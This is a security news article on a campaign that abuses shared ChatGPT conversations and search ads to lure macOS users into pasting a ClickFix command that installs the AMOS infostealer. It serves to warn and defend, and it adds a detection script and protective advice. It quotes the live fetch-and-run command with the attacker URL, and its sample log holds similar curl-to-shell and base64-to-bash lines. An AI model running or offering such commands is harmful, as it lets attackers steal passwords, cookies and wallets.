Cybercriminals Exploit ChatGPT to Spread AMOS Infostealer on macOS via Deceptive Ads and Social Engineering

Cybercriminals Exploit ChatGPT’s Platform to Deploy AMOS Infostealer on macOS

A campaign currently targeting macOS users abuses the official ChatGPT website to distribute the AMOS (Atomic macOS Stealer) malware. It relies on the ClickFix social-engineering technique and uses ChatGPT's chat-sharing feature to host the malicious installation guide on OpenAI's own domain.

Understanding the ClickFix Technique

ClickFix is a social engineering method that manipulates users into executing harmful commands by presenting them as legitimate fixes or installation steps. In this instance, attackers write a fake installation guide into a ChatGPT conversation and publish it with the share feature. Because shared chats are served from OpenAI's official domain, the attacker-written content inherits the site's credibility even though OpenAI never reviewed it.

The Attack Vector

The attack begins with paid search advertisements on Google. When users search for terms such as ChatGPT Atlas, they see sponsored results that appear to lead to the official ChatGPT website, with titles like ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac, lending an air of legitimacy.

Clicking the ad sends the user to a shared ChatGPT conversation containing a fraudulent installation guide, supposedly for the ChatGPT Atlas browser. The guide instructs users to open the Terminal application on their Mac and execute the following command:

```bash
/bin/bash -c $(curl -fsSL 'https://atlas-extension.com/gt')
```

Executing this command fetches a script from the attacker's server and runs it immediately in bash, so the user never sees its contents: the command substitution passes curl's output straight to the shell, and the -fsSL flags make curl fail silently on HTTP errors, suppress progress output and follow redirects. The script repeatedly prompts for the macOS account password until a valid one is entered, then uses those credentials to download and install the AMOS infostealer.
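The command above has a recognisable shape (a download whose output is executed without ever touching disk) that a detection team can hunt for in process-execution telemetry. The following Python is an added example, not code from the original article or from any vendor's product. It flags the command-substitution form used in this campaign and, going beyond the page, two other ClickFix variants that are common in the wild (a download piped into a shell, and a base64 blob decoded into a shell). The key=value log format, hostnames, usernames and the example.test URLs are constructed for the demo; only the atlas-extension.com URL comes from the article.

```python
"""Flag ClickFix-style 'paste this into Terminal' commands in process telemetry.

Added example, not from the original article. The record format below is
constructed for this demo; adapt LINE_RE to your EDR or unified-log export.
"""
import re
from dataclasses import dataclass

# Constructed sample records (not a real log schema). One benign and one
# suspicious command per host; the first suspicious one is the article's command.
SAMPLE_LOG = r'''
ts=2025-11-20T10:01:02Z host=mac-01 user=alice cmd="/bin/bash -c $(curl -fsSL 'https://atlas-extension.com/gt')"
ts=2025-11-20T10:03:14Z host=mac-01 user=alice cmd="brew install wget"
ts=2025-11-20T10:05:40Z host=mac-02 user=bob cmd="curl -fsSL https://example.test/setup.sh | sh"
ts=2025-11-20T10:07:03Z host=mac-02 user=bob cmd="git pull origin main"
ts=2025-11-20T10:09:55Z host=mac-03 user=carol cmd="echo aGVsbG8= | base64 -d | bash"
ts=2025-11-20T10:11:20Z host=mac-03 user=carol cmd="curl -fsSL https://example.test/app.pkg -o app.pkg"
'''

LINE_RE = re.compile(r'ts=(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')
URL_RE = re.compile(r"""https?://[^\s'")]+""")

FETCHER = r'(?:curl|wget)\b'           # tools that pull a payload from the network
SHELL = r'(?:ba|z|da)?sh\b'            # sh, bash, zsh, dash

# Each indicator describes one way a downloaded payload reaches an interpreter
# without being written to a file the user could inspect.
INDICATORS = {
    # bash -c "$(curl ...)" : curl's output becomes the command string (this campaign)
    "fetch_in_command_substitution": re.compile(
        SHELL + r'\s+-c\s+["\']?\$\(\s*' + FETCHER, re.I),
    # curl ... | sh : download piped straight into a shell
    "fetch_piped_to_shell": re.compile(
        FETCHER + r'.*\|\s*(?:sudo\s+)?' + SHELL, re.I),
    # echo <b64> | base64 -d | bash : obfuscated payload decoded into a shell
    "base64_decode_to_shell": re.compile(
        r'base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:sudo\s+)?' + SHELL, re.I),
}


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    indicators: list
    urls: list
    cmd: str


def classify_command(cmd: str) -> list:
    """Return the names of every ClickFix indicator the command line matches."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def scan_log(text: str) -> list:
    """Parse key=value records and return a Finding for each suspicious command."""
    findings = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed records rather than abort the whole scan
        cmd = m.group("cmd")
        hits = classify_command(cmd)
        if hits:
            # Extracting the URL gives the responder an immediate blocking/pivot point.
            findings.append(Finding(m["ts"], m["host"], m["user"], hits, URL_RE.findall(cmd), cmd))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.user}: {', '.join(f.indicators)} urls={f.urls}")
        print(f"    {f.cmd}")
```

The patterns are deliberately narrow so that ordinary developer activity (installing packages, downloading a file to disk, cloning a repository) is not flagged; a plain download that writes to a file is left alone because the user still has a chance to read it before running it. Run against real telemetry, the hits are rare enough that each one warrants a look at the parent process (a browser or Terminal spawned straight from a browser click is the ClickFix signature) and at the URL the script was pulled from.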

Capabilities of AMOS Infostealer

AMOS is a potent malware designed to extract a wide range of sensitive information from infected macOS systems, including:

– Browser Data: Harvests passwords, cookies, and other data from browsers like Chrome and Firefox.

– Cryptocurrency Wallets: Targets applications such as Electrum, Coinomi, and Exodus to steal wallet information.

– Personal Files: Collects files with extensions like TXT, PDF, and DOCX from directories such as Desktop, Documents, and Downloads.

– System Access: Installs a backdoor that activates at system startup, granting attackers persistent remote access to the compromised system.

Broader Implications and Similar Campaigns

This attack is part of a broader trend where cybercriminals exploit trusted platforms and services to distribute malware. Similar campaigns have been observed:

– Fake Microsoft Teams Site: Attackers created a fraudulent Microsoft Teams download page to deploy the Odyssey macOS stealer, using social engineering tactics to trick users into executing malicious code.

– Weaponized Google Meet Pages: Malicious actors have used fake Google Meet landing pages to deliver Remote Access Trojans (RATs), exploiting the trust users place in widely used communication tools.

– ClickFix Lures: Deceptive prompts like Fix Now and Bot Verification have been employed to trick users into downloading and executing malware, highlighting the evolving nature of social engineering attacks.

Protective Measures for macOS Users

To safeguard against such threats, macOS users should adopt the following practices:

1. Verify Sources: Always download software from official and reputable sources. Be cautious of sponsored links and ads that may lead to malicious sites.

2. Exercise Caution with Terminal Commands: Never paste a command from a web page, advertisement or chat into Terminal. Treat shared ChatGPT conversations as unreviewed content written by whoever created them; the fact that they are served from OpenAI's domain does not vouch for what they say. If you must run a downloaded script, save it to a file and read it first rather than feeding curl output directly to bash.

3. Stay Informed: Keep abreast of the latest cybersecurity threats and tactics employed by attackers to recognize and avoid potential scams.

4. Implement Security Solutions: Use reputable endpoint protection that can detect infostealers such as AMOS and block known malicious download domains.

5. Regular Updates: Ensure that your operating system and all installed applications are up to date with the latest security patches.

Conclusion

The use of ChatGPT's own platform to distribute the AMOS infostealer shows how effectively attackers can hide behind trusted domains. By pairing a legitimate host with a convincing ClickFix lure, they can deceive even vigilant users. Staying informed and adopting robust security practices are essential in mitigating these evolving threats.